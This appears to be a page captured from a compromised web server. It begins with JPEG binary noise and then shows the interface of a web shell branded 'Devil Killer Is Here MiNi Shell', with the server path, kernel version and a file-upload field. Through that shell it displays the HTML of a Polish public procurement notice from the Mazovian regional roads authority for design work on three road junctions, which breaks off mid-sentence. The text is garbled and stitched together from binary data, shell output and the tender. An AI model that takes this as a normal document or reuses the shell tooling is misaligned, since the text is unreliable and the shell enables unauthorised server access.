JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211217/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211217/0032103501-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowej , a także uzyskanie w imieniu Zamawiającego decyzji<br/>ZRID: z podziałem na 3 zadania– 147/21 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MAZOWIECKI ZARZĄD DRÓG WOJEWÓDZKICH W WARSZAWIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013305749</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Mazowiecka 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-048</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@mzdw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mzdw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowej , a także uzyskanie w imieniu Zamawiającego decyzji<br/>ZRID: z podziałem na 3 zadania– 147/21 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8aa77a94-5f1b-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00321035</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000501/31/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.50 Oprac dok proj podział na 3cz:cz1 Rozbud skrzyż dr woj 631-14+474 z ul.Szkolną,m.Skrzeszew,cz2Rozbud skrzyż dr woj631-18+379 zDG180525W m.Wieliszew,cz3Rozbud skrzyż dr woj631-18+959 m.Wieliszew</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/mzdw <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/mzdw</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Ofertę,<br/>oświadczenia, o których mowa w art. 125 ust. 1 Pzp., podmiotowe środki dowodowe, pełnomocnictwa,<br/>zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie<br/>dostępnych formatach danych, w szczególności w formatach .pdf, .doc, .docx, .xls, .xlsx .jpg (.jpeg) ze<br/>szczególnym wskazaniem na .pdf. Ofertę, a także oświadczenie o jakim mowa w Rozdziale X ust. 1<br/>SWZ składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym. 2. Postępowanie prowadzone jest w języku<br/>polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem:<br/>https://platformazakupowa.pl/pn/mzdw3. W celu skrócenia czasu udzielenia odpowiedzi na pytania<br/>preferuje się, aby komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia,<br/>wnioski, zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem<br/>platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”. 4. Za datę przekazania<br/>(wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za<br/>pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do<br/>zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego.<br/>5. Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za<br/>pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany<br/>specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie<br/>w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem<br/>platformazakupowa.pl do konkretnego wykonawcy. 6. Wykonawca jako podmiot profesjonalny ma<br/>obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na platformazakupowa.pl<br/>przesłanych przez zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie<br/>może trafić do folderu SPAM. 7. Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z<br/>dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa<br/>niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.: a.<br/>stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, b. komputer<br/>klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego<br/>nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich<br/>nowsze wersje, c. zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer<br/>minimalnie wersja 10 0., d. włączona obsługa JavaScript, e. zainstalowany program Adobe Acrobat<br/>Reader lub inny obsługujący format plików .pdf, f. szyfrowanie na platformazakupowa.pl odbywa się za<br/>pomocą protokołu TLS 1.3.,,g. Oznaczenie czasu odbioru danych przez platformę zakupową stanowi<br/>datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z<br/>zegarem Głównego Urzędu Miar.8. Zamawiający informuje, że instrukcje korzystania z<br/>platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści<br/>SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej<br/>pod adresem: https://platformazakupowa.pl/strona/45-instrukcje 9. W korespondencji kierowanej do<br/>Zamawiającego Wykonawcy powinni posługiwać się numerem przedmiotowego postępowania.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/pn/mzdw</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku<br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119<br/>z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest: Mazowiecki Zarząd Dróg Wojewódzkich w<br/>Warszawie, ul. Mazowiecka 14, 00-048 Warszawa, (22) 244-90-00 do 12;<br/>2) w MZDW powołany został Inspektor Ochrony Danych . Adres e-mail: iod@mzdw.pl; adres: MZDW w<br/>Warszawie, ul. Mazowiecka 14, 00-048 Warszawa. Dane dotyczące inspektora podane są na stronie<br/>internetowej MZDW: bip.mzdw.pl.*;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. C RODO<br/>w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.<br/>Opracowanie dokumentacji projektowej, a także uzyskanie w imieniu Zamawiającego decyzji o<br/>zezwoleniu na realizację inwestycji drogowej dla następujących zadań:<br/>Zadanie nr 1: Rozbudowa skrzyżowania drogi wojewódzkiej nr 631 w km 14+474<br/>z ul. Szkolną w m. Skrzeszew, gmina Wieliszew, powiat legionowski.<br/>Zadanie nr 2: Rozbudowa skrzyżowania drogi wojewódzkiej nr 631 w km 18+379<br/>z DG 180525W w m. Wieliszew, gmina Wieliszew, powiat legionowski.<br/>Zadanie nr 3: Rozbudowa skrzyżowania drogi wojewódzkiej nr 631 w km 18+959 z ul. Słoneczną i ul. Popiełuszki w m. Wieliszew, gmina Wieliszew, powiat legionowski.<br/>– nr postępowania 147/21 prowadzonym w trybie podstawowym bez negocjacji;;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 p.z.p.;<br/>5) okres, przez który Pani/Pana dane osobowe będą przechowywane:<br/>a) przez okres realizacji celu przetwarzania danych osobowych, wskazany<br/>w obowiązujących przepisach prawa;<br/>b) niezbędny do dochodzenia roszczeń przez MZDW w związku z prowadzoną działalnością statutową<br/>lub w celu ochrony przed roszczeniami kierowanymi wobec MZDW, na podstawie powszechnie<br/>obowiązujących przepisów prawa,<br/>z uwzględnieniem okresów przedawnienia roszczeń określonych w powszechnie obowiązujących<br/>przepisach prawa;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane<br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8) posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych**;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa<br/>w art. 18 ust. 2 RODO ***;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych,<br/>gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy<br/>RODO;<br/>9) nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">147/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 1: Rozbudowa skrzyżowania drogi wojewódzkiej nr 631 w km 14+474<br/>z ul. Szkolną w m. Skrzeszew, gmina Wieliszew, powiat legionowski. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">7.	Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy PZP o całej wartości netto 242 125,00 zł, w tym:<br/>- kwota dla zadania 1 wynosi – 79 500,00 zł;<br/>W ramach zamówienia podobnego przewiduje się: prace projektowe na odcinku drogi objętym zamówieniem podstawowym oraz na odcinkach i terenie przyległym do drogi objętej zamówieniem podstawowym we wszystkich branżach: drogowej, sanitarnej, energetycznej, telekomunikacyjnej, gazowej oraz badania geologiczne na odcinku drogi objętym zamówieniem podstawowym oraz na odcinkach i terenie przyległym do drogi objętej zamówieniem podstawowym.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 2: Rozbudowa skrzyżowania drogi wojewódzkiej nr 631 w km 18+379<br/>z DG 180525W w m. Wieliszew, gmina Wieliszew, powiat legionowski. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">7.	Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy PZP o całej wartości netto 242 125,00 zł, w tym:<br/><br/>- kwota dla zadania 2 wynosi - 82 375,00 zł<br/><br/><br/>W ramach zamówienia podobnego przewiduje się: prace projektowe na odcinku drogi objętym zamówieniem podstawowym oraz na odcinkach i terenie przyległym do drogi objętej zamówieniem podstawowym we wszystkich branżach: drogowej, sanitarnej, energetycznej, telekomunikacyjnej, gazowej oraz badania geologiczne na odcinku drogi objętym zamówieniem podstawowym oraz na odcinkach i terenie przyległym do drogi objętej zamówieniem podstawowym.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 3: Rozbudowa skrzyżowania drogi wojewódzkiej nr 631 w km 18+959<br/>z ul. Słoneczną i ul. Popiełuszki w m. Wieliszew, gmina Wieliszew, powiat legionowski. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">7.	Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy PZP o całej wartości netto 242 125,00 zł, w tym:<br/><br/>- kwota dla zadania 3 wynosi - 80 250,00 zł<br/><br/>W ramach zamówienia podobnego przewiduje się: prace projektowe na odcinku drogi objętym zamówieniem podstawowym oraz na odcinkach i terenie przyległym do drogi objętej zamówieniem podstawowym we wszystkich branżach: drogowej, sanitarnej, energetycznej, telekomunikacyjnej, gazowej oraz badania geologiczne na odcinku drogi objętym zamówieniem podstawowym oraz na odcinkach i terenie przyległym do drogi objętej zamówieniem podstawowym.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu, na zasadach określonych w Rozdziale VIII SWZ, oraz spełniają określone przez Zamawiającego warunki 